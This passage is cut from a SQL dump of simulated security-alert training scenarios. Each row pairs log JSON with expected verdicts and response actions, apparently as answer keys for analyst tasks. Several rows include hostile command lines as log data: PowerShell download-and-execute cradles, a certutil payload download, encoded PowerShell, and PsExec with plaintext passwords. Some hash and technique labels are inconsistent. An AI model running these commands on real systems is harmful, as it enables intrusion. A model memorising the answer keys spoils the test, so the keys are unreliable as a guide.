Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(599, 'Lateral Movement Detected in Network', 'high', 'Network traffic analysis', 'The attackers are moving laterally through the network, using compromised credentials and exploiting trust relationships to access additional systems.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"LM-0456\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.50\",\"attacker_ip\":\"203.0.113.45\",\"compromised_user\":\"jdoe\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"network.exe\",\"protocol\":\"HTTP\",\"action\":\"Successful Login\",\"description\":\"User jdoe from IP 192.168.1.25 accessed 192.168.1.50 using compromised credentials. Network traffic analysis reveals communication with external IP 203.0.113.45 and transfer of suspicious file network.exe with hash 5d41402abc4b2a76b9719d911017c592.\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Common internal IP used by workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP of target workstation within internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in unauthorized access attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"network.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File identified as malware used for spreading within the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(600, 'Data Exfiltration via Unusual Channels', 'high', 'Data loss prevention logs', 'Sensitive data was exfiltrated using encrypted channels, indicating a potential ransom demand or further exploitation. The data was sent to an external IP known for malicious activities. The file \'customer_data_backup.zip\' was detected leaving the network from an internal host using unusual ports.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.54\",\"protocol\":\"HTTPS\",\"port\":443,\"filename\":\"customer_data_backup.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"event\":\"data_exfiltration_attempt\",\"encryption\":\"TLS\",\"alert_id\":\"EXFIL-12345\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host used for data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data theft.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"customer_data_backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention System\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(601, 'Brute Force Attack Detected on Corporate Server', 'high', 'Splunk', 'Multiple failed login attempts detected from a suspicious foreign IP address targeting the corporate server. This indicates a possible brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"45.67.89.123\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"corp-server-01\",\"failed_attempts\":34}', '2026-01-11 14:04:23', '2026-01-11 14:04:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a known malicious IP strongly indicates a brute force attempt.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'),
(602, 'Malware Detected via Suspicious Process Execution', 'critical', 'CrowdStrike', 'A known malware file was executed on a company workstation. The file hash matches a sample with widespread detection on VirusTotal.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.22\",\"username\":\"jdoe\",\"hostname\":\"workstation-55\",\"command_line\":\"C:\\\\malware\\\\bad.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 14:04:23', '2026-01-11 14:04:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 60 security vendors\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Execution of a file with a known malicious hash indicates a malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(603, 'Phishing Email Containing Malicious URL', 'high', 'Proofpoint', 'A phishing email containing a malicious URL was received. The URL is known for hosting malware.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:05:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.50\",\"username\":\"jsmith\",\"hostname\":\"mail-server-01\",\"email_sender\":\"spoofed@malicious.com\",\"url\":\"http://bad-url.com\"}', '2026-01-11 14:04:23', '2026-01-11 14:04:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"spoofed@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://bad-url.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts known malware\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a malicious URL in the email indicates a phishing attempt aimed at compromising user credentials.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT'),
(604, 'False Positive: Legitimate User Activity Mistaken for Malicious', 'low', 'Firewall', 'A legitimate user accessing an external service was flagged as suspicious due to an incorrect firewall rule.', 'Network Traffic', 'T1040', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"104.26.2.33\",\"username\":\"mgomez\",\"hostname\":\"laptop-34\",\"domain\":\"example.com\"}', '2026-01-11 14:04:23', '2026-01-11 14:04:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"104.26.2.33\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Reputable domain with no malicious history\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic\",\"analysis_notes\":\"The connection was flagged due to an overly restrictive firewall rule, not because of any real threat.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS'),
(605, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A PowerShell command was executed on the host which is commonly associated with malicious activity. The command attempts to download a file from an external IP address.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"command_line\":\"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45/malicious.ps1\')\\\"\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnop3456\",\"domain\":\"malicious-site.com\"}', '2026-01-11 14:05:25', '2026-01-11 14:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 123 times for hosting malicious scripts\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnop3456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in 5/5 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45/malicious.ps1\')\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command pattern associated with fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command and the external IP address are both indicators of a malicious activity. Immediate action is required.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT'),
(606, 'Failed Login Attempts from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected from an external IP address, indicating a possible brute force attack.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.25\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"WEB-SERVER-01\",\"failed_attempts\":35}', '2026-01-11 14:05:25', '2026-01-11 14:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in brute force attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a foreign IP address indicates a likely brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'),
(607, 'Phishing Email with Malicious URL Detected', 'high', 'Proofpoint', 'A phishing email was received containing a malicious URL, attempting to trick the user into visiting a fake login page.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.0.0.15\",\"username\":\"asmith\",\"hostname\":\"MAIL01\",\"email_sender\":\"no-reply@fakesite.com\",\"url\":\"http://fakesite.com/login\"}', '2026-01-11 14:05:25', '2026-01-11 14:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fakesite.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for hosting phishing pages\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@fakesite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered, associated with phishing\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a malicious URL leading to a phishing page. The sender\'s domain is not legitimate.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'),
(608, 'Unusual Login Activity Detected from Known VPN Provider', 'low', 'Wazuh', 'A login attempt was detected from an IP address associated with a known VPN provider. The activity appears benign after further investigation.', 'Suspicious Login', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.0.2.10\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jsmith\",\"hostname\":\"LAPTOP-02\"}', '2026-01-11 14:05:25', '2026-01-11 14:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with benign VPN provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with a legitimate VPN provider, and the login activity matches a known user\'s behavior.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'),
(609, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A suspicious PowerShell script was executed on an internal machine. This script is known to download additional malware.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com\')\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\"}', '2026-01-11 01:10:03', '2026-01-11 14:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, not exposed to the internet.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known malicious PowerShell command to download and execute scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is a known indicator of compromise for malware download and execution.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
(610, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email containing a link to a known malicious domain was received by a user.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"192.168.1.20\",\"username\":\"asmith\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"phish@evil.com\",\"url\":\"http://phishing.example.com\",\"email_subject\":\"Urgent: Verify Your Account\"}', '2026-01-10 21:27:24', '2026-01-11 14:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"phish@evil.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://phishing.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing schemes.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a malicious site, confirmed by multiple OSINT sources.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT'),
(611, 'Internal Network Lateral Movement via PSExec', 'medium', 'Wazuh', 'A suspicious PSExec activity was detected moving laterally within the network from one internal host to another.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\"}', '2026-01-11 02:27:11', '2026-01-11 14:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the initiating host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target host.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage can indicate lateral movement.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec used to execute commands remotely, indicating possible lateral movement.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'),
(612, 'Brute Force Login Attempt Detected', 'medium', 'Splunk', 'Multiple failed login attempts were detected from a foreign IP address, indicating a possible brute force attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.30\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER\",\"failed_attempts\":25}', '2026-01-09 19:58:44', '2026-01-11 14:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported in multiple brute force attempts but not confirmed malicious.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Common administrative account targeted by attackers.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP showed failed login attempts but without successful access. No further malicious activity detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(613, 'Suspicious PowerShell Execution Detected with Encoded Command', 'high', 'CrowdStrike', 'A PowerShell process was detected executing an encoded command, indicating possible obfuscation attempts to evade detection.', 'Malware', 'T1086', 1, 'New', NULL, '{\"timestamp\":\"2026-01-10T19:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JAB3AGgAYQB0ACAAJwAnADsAIAAkAHUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwA7ACAAIgAkAHIAZQBwACAAJwAnAA==\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-10 04:01:28', '2026-01-11 14:06:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB3AGgAYQB0ACAAJwAnADsAIAAkAHUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwA7ACAAIgAkAHIAZQBwACAAJwAnAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for obfuscation detected in multiple malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent suspicious activity, but not confirmed malicious\"}}],\"expected_actions\":[\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is a common tactic for malware to evade detection. This activity requires further investigation and containment.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(614, 'Internal Network Lateral Movement via PSExec', 'critical', 'Wazuh', 'An internal system was used to execute a remote command on another internal machine using PSExec, indicating potential lateral movement.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-10T21:12:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.75\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"psexec \\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\"}', '2026-01-10 10:01:55', '2026-01-11 14:06:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of the initiating system within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP of the target system within the network\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec used for lateral movement, a known technique for spreading malware internally\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec for remote command execution is a strong indicator of lateral movement within the network. Immediate investigation and host isolation are advised.\"}', 'Advanced', 'EDR', 7, 1, 'TECH'),
(615, 'Potential Data Exfiltration via Certutil', 'high', 'Splunk', 'Certutil was observed being used to download a file from an external source, a technique often used for data exfiltration or downloading malicious payloads.', 'Data Exfil', 'T1140', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.100\",\"dst_ip\":\"203.0.113.85\",\"username\":\"hsmith\",\"hostname\":\"WORKSTATION-03\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\"}', '2026-01-10 07:17:02', '2026-01-11 14:06:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil used to download potentially malicious file\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of certutil for downloading files from external sources is indicative of data exfiltration or malware download. Further investigation is necessary.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT'),
(616, 'False Positive: Legitimate Use of MSHTA Detected', 'medium', 'IDS', 'An MSHTA execution was detected, which is commonly used by attackers for executing scripts. However, this instance was identified as a legitimate use case by an internal script.', 'Malware', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:40:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.120\",\"dst_ip\":\"\",\"username\":\"serviceaccount\",\"hostname\":\"SERVER-02\",\"command_line\":\"mshta.exe http://intranet.example.com/script.hta\",\"domain\":\"intranet.example.com\"}', '2026-01-10 16:40:24', '2026-01-11 14:06:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server executing the script\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta.exe http://intranet.example.com/script.hta\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Legitimate execution of an internal script\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"intranet.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Internal domain for legitimate business 